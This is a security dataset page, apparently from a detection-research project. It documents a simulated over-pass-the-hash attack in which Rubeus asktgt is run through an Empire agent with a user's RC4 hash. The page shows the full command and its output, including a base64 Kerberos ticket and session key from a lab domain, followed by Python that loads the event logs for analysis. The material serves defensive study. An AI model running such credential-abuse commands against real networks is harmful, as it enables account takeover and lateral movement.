Rubeus Elevated ASKTGT CreateNetOnly

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/19

Modification Date

2020/09/21

Tactics

TA0006

Techniques

T1003.003

Tags

Over-Pass-The-Hash,Not Touching LSASS

Dataset Description

This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.

Simulation Metadata

Tools

type

Name

Module

C2

Empire

shell

binary

Rubeus

asktgt

Adversary View

(Empire: G6BYHU4F) > shell C:\users\sbeavers\Desktop\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /createnetonly:C:\Windows\System32\cmd.exe
[*] Tasked 4EH9PC5S to run TASK_SHELL
[*] Agent 4EH9PC5S tasked with task ID 4
(Empire: 4EH9PC5S) > 
______        _                      
  (_____ \      | |                     
  _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0 

[*] Action: Ask TGT

[*] Showing process : False
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 10064
[+] LUID            : 0x42e7ba4

[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8
[*] Target LUID : 70155172
[*] Building AS-REQ (w/ preauth) for: 'theshire.local\pgustavo'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw
      IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr
      UHw92ESRb2uzf7C3GBZL2lN1UdDFIhvklZB/K21vINZO3G+ExWvoUxSVQQ+vYABaHcPGGeuYhXxRTwZB
      kPGYa0cFXtMSdSvXCGWVLz6LFPTco3puJNx4d0exgnjTBUp3MUQMw8x2CACCL9Cv0RYN+Wy4WLTzIF0t
      StYJk0I6g+vob7jOOAE6h8wp3XDfArkfcGndJmzBAgx5IeAL10yYArod69MykefCt3/uIbNJ9waMhov4
      cUInkStzt0QcFTZbvNgC30Dhew3jkzRBd5XxCHGMWkhY60ibhvfw5czUgAJ8VcsKfG+X1zkwIGRXxRhc
      c8COT4Z9614twkwjQ50FiRIxZBWHkxAKvzrwDtVE5v2alwfy827Sse85RoXPebKH11RMy8vFyPKsz4F8
      46Wv5F0wXPf1vEl5z99KatYf+DtBpYg+ZO7S6pT9Ov/dRkdKMBCNp/hCuiL4imjlpMaMoqiXaWSA0E61
      8ihQGj/qHXns2u4vujlrx/lvxgf/uCqanH5MYBviyFyvVDeuYw5yHQ0LXaf9aOcnOg3XnwJJfks/u+FZ
      FjDnfvubv1nNaPQ9QtzM2P5Y3U6/14a4Ks6XNocwWBbtAOXZ0ttzs+W1S7sXjSuPlZ3uye4yLMEV+u3h
      BwFoAQVl7usydsTx8Cur3FZQagYbdnJt6wOk5MtR7AlJvZ9WwJ6AOsaTFRyQ7rrHN6kFQklPELMCV7Dl
      5bR79T31hC7wEQ/eFWMuL9EeurCD20mhoDQCqLttEetwEi7R8LXE/shPKZNY/4cFhWtODbtUzMLzNo3W
      pvxOPNce0dB4lv8frBVFqumyMDKxcDkjEZv7uQaMH+ofWaAPARnRSzYSK+Bf8ECJTg4Cz5aHp4Mz6rJb
      1UcyQ1KyS150j0L/bIGfXr6u+CDKCvQ8w+h8p0gfqaqiNOyVfVdrHxxqcfnxrTOBoxNXwm02PomiGoH9
      T/uFchWCsM7OyCe1v05QT3jSi5Z2yHBmFWHLei96zm4Vu7JRkcQukE79q4Tb4OdiKuub0TByaDSAkC7a
      sd4QWyOew6gfbfJmAMkFAJnnAtIObcbeXBM/++sK1kpbs7fOVkCZP3w5arGsaY0zwwU9o/amWWalGrNd
      4jZq1xRJau7zwANNKTpEmXm10LGtdODlTpUfYSJTne97WzUBFLLMvUOMsVOeotm11qflE/BXU/MVmPJa
      7aaOEtApZHcHhQb+/u55SmrHXs1NQGtFsbBKotR7miHsOUqjhRBOmbjXEz8St4MoHqf7aJcIy20IoW8Q
      ASNHJSJHuDLJ5j+Wf+x0pV9dl03ocbaxWvtNzNw8drbo8bh2EWJmA9BdsKOB3DCB2aADAgEAooHRBIHO
      fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEE6gkql0M63etr3rDe/EiAyhEBsOVEhFU0hJUkUuTE9D
      QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAzMDMwN1qmERgPMjAy
      MDA5MjIxMzAzMDdapxEYDzIwMjAwOTI5MDMwMzA3WqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa
      MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=
[*] Target LUID: 0x42e7ba4
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  pgustavo
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  9/21/2020 11:03:07 PM
  EndTime               :  9/22/2020 9:03:07 AM
  RenewTill             :  9/28/2020 11:03:07 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  TqCSqXQzrd62vesN78SIDA==


..Command execution completed.

(Empire: 4EH9PC5S) > 

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_createnetonly.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)